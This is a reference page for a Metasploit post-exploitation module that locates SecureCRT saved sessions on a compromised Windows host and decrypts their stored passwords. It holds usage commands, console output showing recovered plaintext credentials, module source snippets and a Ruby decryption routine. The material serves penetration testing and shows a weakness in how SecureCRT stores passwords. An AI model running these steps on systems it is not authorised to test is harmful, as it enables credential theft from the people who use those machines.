Windows SecureCRT Session Information Enumeration - Metasploit
This page contains detailed information about how to use the post/windows/gather/credentials/securecrt metasploit module. For a list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Windows SecureCRT Session Information Enumeration
Module: post/windows/gather/credentials/securecrt
Source code: modules/post/windows/gather/credentials/securecrt.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module will determine if SecureCRT is installed on the target system and, if it is, it will try to dump all saved session information from the target. The passwords for these saved sessions will then be decrypted where possible, using the decryption information that HyperSine reverse engineered. Note that whilst SecureCRT has installers for Linux, Mac and Windows, this module presently only works on Windows.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Side Effects:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/windows/gather/credentials/securecrt
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/windows/gather/credentials/securecrt
msf post(securecrt) > show options
... show and set options ...
msf post(securecrt) > set SESSION session-id
msf post(securecrt) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/windows/gather/credentials/securecrt")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Vulnerable Application
All SecureCRT installations are affected, regardless of which OS they are installed on, since they all use the same encryption mechanisms described by HyperSine in his GitHub paper. Note that at the moment this module only supports exploiting Windows machines.
Overview
All versions of SecureCRT have an option to allow users to store an encrypted copy of their session information on the local computer, allowing them to easily restart a session without having to reenter all the connection details such as the host, username, and password. These details are stored in a local session file, and SecureCRT will additionally encrypt the password with AES encryption.
Unfortunately for SecureCRT users, the encryption mechanism uses a weak IV of all zeros, and the encryption keys used to encrypt the passwords have been publicly reversed and documented by HyperSine in his GitHub paper.
In addition, HyperSine also published a PoC script that allows users to decrypt SecureCRT session files, regardless of the version of SecureCRT installed. The only limitation is that users must know the SecureCRT configuration password if one was set at installation. At the time of writing, September 11, 2020, it appears that Vandyke, the creators of SecureCRT, have still not changed the implementation details for this session encryption algorithm.
This module ports the work from HyperSine and implements it in a Metasploit module that allows users to easily retrieve any SecureCRT session files from a compromised Windows machine and then decrypt the session passwords where it is possible to do so. All session information retrieved will be stored in a Metasploit loot file, along with the password if it can be decrypted.
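As an added illustration of the scheme described above (example code written for this page, not the Metasploit module's or HyperSine's code), the following Ruby builds a "Password V2" blob and runs the SHA-256 check that tells a correct passphrase from a wrong or missing one, which is the same check behind the module's "configuration password" warning. It assumes, following HyperSine's write-up, that the key is SHA-256 of the configuration passphrase (the empty string when none was set), the IV is all zeros, cipher padding is disabled, the plaintext is a little-endian length, the password, its SHA-256 and random filler, and the .ini stores the hex ciphertext behind an "02:" prefix; the sample password and passphrase are constructed.

```ruby
require 'openssl'

# Added example for this page; not code from the Metasploit module or from HyperSine.
# Assumed "Password V2" layout (per HyperSine's write-up):
#   key = SHA-256(configuration passphrase; "" when none was set)
#   AES-256-CBC, IV = 16 zero bytes, cipher padding disabled
#   plaintext = uint32 LE length || password (UTF-8) || SHA-256(password) || random filler
#   stored in the .ini as "02:" followed by the hex-encoded ciphertext
ZERO_IV = ("\x00" * 16).b

def v2_key(passphrase)
  OpenSSL::Digest::SHA256.digest(passphrase.to_s)
end

def aes_cbc(mode, key, data)
  cipher = OpenSSL::Cipher.new('AES-256-CBC')
  mode == :encrypt ? cipher.encrypt : cipher.decrypt
  cipher.key = key
  cipher.iv = ZERO_IV
  cipher.padding = 0 # the format brings its own filler bytes
  cipher.update(data) + cipher.final
end

# Builds a constructed v2 blob so the check below has something to run on.
def encode_password_v2(password, passphrase)
  pw = password.encode('UTF-8').b
  body = [pw.bytesize].pack('V') + pw + OpenSSL::Digest::SHA256.digest(pw)
  body += OpenSSL::Random.random_bytes((-body.bytesize) % 16)
  '02:' + aes_cbc(:encrypt, v2_key(passphrase), body).unpack1('H*')
end

# Decrypts a v2 blob and returns the password only when the embedded SHA-256
# matches. A wrong or missing passphrase produces garbage that fails this check,
# which is what the module's "configuration password" warning is based on.
def decode_password_v2(blob, passphrase = '')
  return nil unless blob.is_a?(String) && blob.start_with?('02:')
  ciphertext = [blob[3..-1]].pack('H*')
  return nil if ciphertext.empty? || ciphertext.bytesize % 16 != 0
  plain = aes_cbc(:decrypt, v2_key(passphrase), ciphertext)
  len = plain[0, 4].unpack1('V')
  return nil if len.nil? || 4 + len + 32 > plain.bytesize
  pw = plain[4, len]
  return nil unless OpenSSL::Digest::SHA256.digest(pw) == plain[4 + len, 32]
  pw.force_encoding('UTF-8')
end

if $PROGRAM_NAME == __FILE__
  blob = encode_password_v2('thePassword123!', 'whatabadpassword') # constructed sample
  puts "with passphrase:    #{decode_password_v2(blob, 'whatabadpassword').inspect}"
  puts "without passphrase: #{decode_password_v2(blob).inspect}"
  puts "no passphrase set:  #{decode_password_v2(encode_password_v2('s3cret', ''), '').inspect}"
end
```

With no configuration passphrase the key is a public constant (SHA-256 of the empty string), so the only secret protecting a stored password is the passphrase itself; that is the exposure this module demonstrates and the reason a passphrase should be set.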
Setup Steps
- Download the latest installer of SecureCRT from https://www.vandyke.com/cgi-bin/releases.php?product=securecrt. You will need a valid login, which can be obtained by completing the registration form at https://www.vandyke.com/cgi-bin/download_application.php?pid=scrt_x64_873&force=1, after which an email will be sent to you with the valid login details.
- Follow the installer's prompts to install the software. Select all the default settings.
- Once everything has been installed, start SecureCRT. A prompt will appear asking if one wants to set a configuration passphrase to encrypt sensitive data such as saved passwords and login actions. Set a passphrase of your choice here, but be sure to remember it.
- Set up an SSH server on your target. For Windows 10 v1809 and later and Windows Server 2019 and later, this can be done by running the PowerShell command Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0, followed by Start-Service sshd.
Verification Steps
- Use SecureCRT to log in to an SSH server of your choosing. When logging in, remember to select the check box to save the username (selected by default), as well as the check box to save the account password.
- Get a meterpreter session on the Windows host running SecureCRT.
- Do: run post/windows/gather/credentials/securecrt
- Optional: Run set PASSPHRASE *SecureCRT configuration passphrase* if a configuration passphrase was set for SecureCRT and you know its value.
- If the session file was saved on the target, the module will print out the details of the host and port that the user connected to, as well as which username the user signed in with and the plaintext version of the password that was used.
Options
PASSPHRASE
The configuration password that was set when SecureCRT was installed, if one was supplied. Note that if this value is not supplied and SecureCRT was set up to use a configuration password, it will not be possible to decrypt the encrypted SecureCRT passwords that are retrieved.
SESSION_PATH
The path to the SecureCRT session directory on the target's computer. By default this is stored at C:\Users\*current user name*\AppData\Roaming\VanDyke\Config\Sessions if SecureCRT is installed on the system. However, SecureCRT also has a portable version that stores the session information in a local folder along with the SecureCRT binary itself, allowing users to easily transfer their session information between machines. In this case, users can set the SESSION_PATH option to the location of the session directory within the portable folder to obtain SecureCRT session information even if a portable version of SecureCRT is used on the target.
Scenarios
Windows Server 2019 Standard Edition with SecureCRT v8.7.3 Build 2279 (Configuration Password Enabled)
msf6 exploit(multi/handler) > use post/windows/gather/credentials/securecrt
msf6 post(windows/gather/credentials/securecrt) > info
Name: Windows SecureCRT Session Information Enumeration
Module: post/windows/gather/credentials/securecrt
Platform: Windows
Arch:
Rank: Normal
Provided by:
HyperSine
Kali-Team
Compatible session types:
Meterpreter
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSPHRASE no The configuration password that was set when SecureCRT was installed, if one was supplied
SESSION yes The session to run this module on.
Description:
This module will determine if SecureCRT is installed on the target
system and, if it is, it will try to dump all saved session
information from the target. The passwords for these saved sessions
will then be decrypted where possible, using the decryption
information that HyperSine reverse engineered. Note that whilst
SecureCRT has installers for Linux, Mac and Windows, this module
presently only works on Windows.
References:
https://github.com/HyperSine/how-does-SecureCRT-encrypt-password/blob/master/doc/how-does-SecureCRT-encrypt-password.md
msf6 post(windows/gather/credentials/securecrt) > set SESSION 1
SESSION => 1
msf6 post(windows/gather/credentials/securecrt) > set Passphrase whatabadpassword
Passphrase => whatabadpassword
msf6 post(windows/gather/credentials/securecrt) > run
[*] Gathering SecureCRT session information from WIN-M5JU6L5RA9L
[*] Searching for session files in C:\Users\normal\AppData\Roaming\VanDyke\Config\Sessions
SecureCRT Sessions
==================
Filename Protocol Hostname Port Username Password
-------- -------- -------- ---- -------- --------
127.0.0.1 (1).ini telnet 127.0.0.1 23 RAPID7\Administrator thePassword123!
127.0.0.1 (2).ini ssh2 127.0.0.1 22 Administrator thePassword123!
127.0.0.1 (3).ini ssh2 127.0.0.1 22 Administrator
127.0.0.1.ini telnet 127.0.0.1 23
msf6 post(windows/gather/credentials/securecrt) >
Windows Server 2019 Standard Edition with SecureCRT v8.7.3 Build 2279 (Configuration Password Enabled, But No Password Provided)
msf6 exploit(multi/handler) > use post/windows/gather/credentials/securecrt
msf6 post(windows/gather/credentials/securecrt) > info
Name: Windows SecureCRT Session Information Enumeration
Module: post/windows/gather/credentials/securecrt
Platform: Windows
Arch:
Rank: Normal
Provided by:
HyperSine
Kali-Team
Compatible session types:
Meterpreter
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSPHRASE no The configuration password that was set when SecureCRT was installed, if one was supplied
SESSION yes The session to run this module on.
Description:
This module will determine if SecureCRT is installed on the target
system and, if it is, it will try to dump all saved session
information from the target. The passwords for these saved sessions
will then be decrypted where possible, using the decryption
information that HyperSine reverse engineered. Note that whilst
SecureCRT has installers for Linux, Mac and Windows, this module
presently only works on Windows.
References:
https://github.com/HyperSine/how-does-SecureCRT-encrypt-password/blob/master/doc/how-does-SecureCRT-encrypt-password.md
msf6 post(windows/gather/credentials/securecrt) > set SESSION 1
SESSION => 1
msf6 post(windows/gather/credentials/securecrt) > run
[*] Gathering SecureCRT session information from WIN-M5JU6L5RA9L
[*] Searching for session files in C:\Users\Administrator\AppData\Roaming\VanDyke\Config\Sessions
[-] It seems the user set a configuration password when installing SecureCRT!
[-] If you know the configuration password, please provide it via the PASSPHRASE option and then run the module again.
SecureCRT Sessions
==================
Filename Hostname Port Username Password
-------- -------- ---- -------- --------
127.0.0.1.ini 127.0.0.1 22 RAPID7\Administrator
[+] Session info stored in: /home/gwillcox/.msf4/loot/20200911125521_default_172.20.150.24_host.securecrt_s_951139.txt
[*] Post module execution completed
msf6 post(windows/gather/credentials/securecrt) >
Msfconsole Usage
Here is how the windows/gather/credentials/securecrt post exploitation module looks in the msfconsole:
msf6 > use post/windows/gather/credentials/securecrt
msf6 post(windows/gather/credentials/securecrt) > show info
Name: Windows SecureCRT Session Information Enumeration
Module: post/windows/gather/credentials/securecrt
Platform: Windows
Arch:
Rank: Normal
Provided by:
HyperSine
Kali-Team <kali-team[at]qq.com>
Compatible session types:
Meterpreter
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSPHRASE no The configuration password that was set when SecureCRT was installed, if one was supplied
SESSION yes The session to run this module on.
SESSION_PATH no Specifies the session directory path for SecureCRT
Description:
This module will determine if SecureCRT is installed on the target
system and, if it is, it will try to dump all saved session
information from the target. The passwords for these saved sessions
will then be decrypted where possible, using the decryption
information that HyperSine reverse engineered. Note that whilst
SecureCRT has installers for Linux, Mac and Windows, this module
presently only works on Windows.
References:
https://github.com/HyperSine/how-does-SecureCRT-encrypt-password/blob/master/doc/how-does-SecureCRT-encrypt-password.md
Module Options
This is a complete list of options available in the windows/gather/credentials/securecrt post exploitation module:
msf6 post(windows/gather/credentials/securecrt) > show options
Module options (post/windows/gather/credentials/securecrt):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSPHRASE no The configuration password that was set when SecureCRT was installed, if one was supplied
SESSION yes The session to run this module on.
SESSION_PATH no Specifies the session directory path for SecureCRT
Advanced Options
Here is a complete list of advanced options supported by the windows/gather/credentials/securecrt post exploitation module:
msf6 post(windows/gather/credentials/securecrt) > show advanced
Module advanced options (post/windows/gather/credentials/securecrt):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the windows/gather/credentials/securecrt module can do:
msf6 post(windows/gather/credentials/securecrt) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the windows/gather/credentials/securecrt post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(windows/gather/credentials/securecrt) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Error Messages
This module may fail with the following error messages:
- Couldn't find any session files at <PATH>
- The SecureCRT registry key on the target is likely misconfigured. The directory at <PATH> is inaccessable or doesn't exist
- It was not possible to decode one of the v1 passwords successfully, please double check the results!
- It seems the user set a configuration password when installing SecureCRT!
- If you know the configuration password, please provide it via the PASSPHRASE option and then run the module again.
- Could not find the registry entry for the SecureCRT session path. Ensure that SecureCRT is installed on the target.
Check the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
Couldn't find any session files at <PATH>
Here is a relevant code snippet related to the "Couldn't find any session files at <PATH>" error message:
config_ini = []
tbl = []
begin
  print_status("Searching for session files in #{path}")
  config_ini += session.fs.file.search(path, '*.ini')
  fail_with(Failure::BadConfig, "Couldn't find any session files at #{path}") if config_ini.empty?
rescue Rex::Post::Meterpreter::RequestError
  fail_with(Failure::BadConfig, "The SecureCRT registry key on the target is likely misconfigured. The directory at #{path} is inaccessable or doesn't exist")
end

# enum session file
The SecureCRT registry key on the target is likely misconfigured. The directory at <PATH> is inaccessable or doesn't exist
Here is a relevant code snippet related to the "The SecureCRT registry key on the target is likely misconfigured. The directory at <PATH> is inaccessable or doesn't exist" error message:
begin
  print_status("Searching for session files in #{path}")
  config_ini += session.fs.file.search(path, '*.ini')
  fail_with(Failure::BadConfig, "Couldn't find any session files at #{path}") if config_ini.empty?
rescue Rex::Post::Meterpreter::RequestError
  fail_with(Failure::BadConfig, "The SecureCRT registry key on the target is likely misconfigured. The directory at #{path} is inaccessable or doesn't exist")
end

# enum session file
config_ini.each do |item|
  file_name = item['path'] + session.fs.file.separator + item['name']
It was not possible to decode one of the v1 passwords successfully, please double check the results!
Here is a relevant code snippet related to the "It was not possible to decode one of the v1 passwords successfully, please double check the results!" error message:
  (0..padded_plain_bytes.length).step(2) do |i|
    if (padded_plain_bytes[i] == "\x00" && padded_plain_bytes[i + 1] == "\x00")
      return padded_plain_bytes[0..i - 1].force_encoding('UTF-16LE').encode('UTF-8')
    end
  end
  print_warning('It was not possible to decode one of the v1 passwords successfully, please double check the results!')
  return nil # We didn't decode the password successfully, so just return nil.
end

def securecrt_crypto_v2(ciphertext)
  return nil if ciphertext.nil? || ciphertext.empty?
It seems the user set a configuration password when installing SecureCRT!
Here is a relevant code snippet related to the "It seems the user set a configuration password when installing SecureCRT!" error message:
  plain_bytes_digest = padded_plain_bytes[4 + plain_bytes_length, 32]
  if (OpenSSL::Digest::SHA256.new(plain_bytes).digest == plain_bytes_digest) # verify
    return plain_bytes.force_encoding('UTF-8')
  end

  print_warning('It seems the user set a configuration password when installing SecureCRT!')
  print_warning('If you know the configuration password, please provide it via the PASSPHRASE option and then run the module again.')
  return nil
end

def securecrt_store_config(config)
If you know the configuration password, please provide it via the PASSPHRASE option and then run the module again.
Here is a relevant code snippet related to the "If you know the configuration password, please provide it via the PASSPHRASE option and then run the module again." error message:
  if (OpenSSL::Digest::SHA256.new(plain_bytes).digest == plain_bytes_digest) # verify
    return plain_bytes.force_encoding('UTF-8')
  end

  print_warning('It seems the user set a configuration password when installing SecureCRT!')
  print_warning('If you know the configuration password, please provide it via the PASSPHRASE option and then run the module again.')
  return nil
end

def securecrt_store_config(config)
  if config[:hostname].to_s.empty? || config[:service_name].to_s.empty? || config[:port].to_s.empty? || config[:username].to_s.empty? || config[:password].nil?
Could not find the registry entry for the SecureCRT session path. Ensure that SecureCRT is installed on the target.
Here is a relevant code snippet related to the "Could not find the registry entry for the SecureCRT session path. Ensure that SecureCRT is installed on the target." error message:
else
  securecrt_path = expand_path(datastore['SESSION_PATH'])
end

if securecrt_path.to_s.empty?
  fail_with(Failure::NotFound, 'Could not find the registry entry for the SecureCRT session path. Ensure that SecureCRT is installed on the target.')
else
  result = enum_session_file(securecrt_path)
  columns = [
    'Filename',
    'Protocol',
Related Pull Requests
- #14806 Merged Pull Request: Rubocop recently landed modules continued
- #14734 Merged Pull Request: Rubocop recently landed modules
- #14341 Merged Pull Request: Fix NIL Dereference Issues, Missing fail_with Statements, and Update Regex Inside SecureCRT Password Gatherer
- #14199 Merged Pull Request: Fix gather securecrt password bug
- #14118 Merged Pull Request: Origin/gather securecrt password
References
- CVE: Not available
- https://github.com/HyperSine/how-does-SecureCRT-encrypt-password/blob/master/doc/how-does-SecureCRT-encrypt-password.md
See Also
Check also the following modules related to this module:
- post/windows/gather/credentials/aim
- post/windows/gather/credentials/avira_password
- post/windows/gather/credentials/bulletproof_ftp
- post/windows/gather/credentials/chrome
- post/windows/gather/credentials/comodo
- post/windows/gather/credentials/coolnovo
- post/windows/gather/credentials/coreftp
- post/windows/gather/credentials/credential_collector
- post/windows/gather/credentials/digsby
- post/windows/gather/credentials/domain_hashdump
- post/windows/gather/credentials/dynazip_log
- post/windows/gather/credentials/dyndns
- post/windows/gather/credentials/enum_cred_store
- post/windows/gather/credentials/enum_laps
- post/windows/gather/credentials/enum_picasa_pwds
- post/windows/gather/credentials/epo_sql
- post/windows/gather/credentials/filezilla_server
- post/windows/gather/credentials/flashfxp
- post/windows/gather/credentials/flock
- post/windows/gather/credentials/ftpnavigator
- post/windows/gather/credentials/ftpx
- post/windows/gather/credentials/gadugadu
- post/windows/gather/credentials/gpp
- post/windows/gather/credentials/heidisql
- post/windows/gather/credentials/icq
- post/windows/gather/credentials/idm
- post/windows/gather/credentials/ie
- post/windows/gather/credentials/imail
- post/windows/gather/credentials/imvu
- post/windows/gather/credentials/incredimail
- post/windows/gather/credentials/kakaotalk
- post/windows/gather/credentials/kmeleon
- post/windows/gather/credentials/line
- post/windows/gather/credentials/maxthon
- post/windows/gather/credentials/mcafee_vse_hashdump
- post/windows/gather/credentials/mdaemon_cred_collector
- post/windows/gather/credentials/meebo
- post/windows/gather/credentials/miranda
- post/windows/gather/credentials/moba_xterm
- post/windows/gather/credentials/mremote
- post/windows/gather/credentials/mssql_local_hashdump
- post/windows/gather/credentials/navicat
- post/windows/gather/credentials/nimbuzz
- post/windows/gather/credentials/opera
- post/windows/gather/credentials/operamail
- post/windows/gather/credentials/outlook
- post/windows/gather/credentials/postbox
- post/windows/gather/credentials/pulse_secure
- post/windows/gather/credentials/purevpn_cred_collector
- post/windows/gather/credentials/qq
- post/windows/gather/credentials/razer_synapse
- post/windows/gather/credentials/razorsql
- post/windows/gather/credentials/rdc_manager_creds
- post/windows/gather/credentials/redis_desktop_manager
- post/windows/gather/credentials/safari
- post/windows/gather/credentials/seamonkey
- post/windows/gather/credentials/skype
- post/windows/gather/credentials/smartermail
- post/windows/gather/credentials/smartftp
- post/windows/gather/credentials/spark_im
- post/windows/gather/credentials/srware
- post/windows/gather/credentials/sso
- post/windows/gather/credentials/steam
- post/windows/gather/credentials/tango
- post/windows/gather/credentials/teamviewer_passwords
- post/windows/gather/credentials/thunderbird
- post/windows/gather/credentials/thycotic_secretserver_dump
- post/windows/gather/credentials/tlen
- post/windows/gather/credentials/tortoisesvn
- post/windows/gather/credentials/total_commander
- post/windows/gather/credentials/trillian
- post/windows/gather/credentials/viber
- post/windows/gather/credentials/vnc
- post/windows/gather/credentials/windows_autologin
- post/windows/gather/credentials/windowslivemail
- post/windows/gather/credentials/windows_sam_hivenightmare
- post/windows/gather/credentials/winscp
- post/windows/gather/credentials/wsftp_client
- post/windows/gather/credentials/xchat
- post/windows/gather/credentials/xshell_xftp_password
Authors
- HyperSine
- Kali-Team <kali-team[at]qq.com>
Version
This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.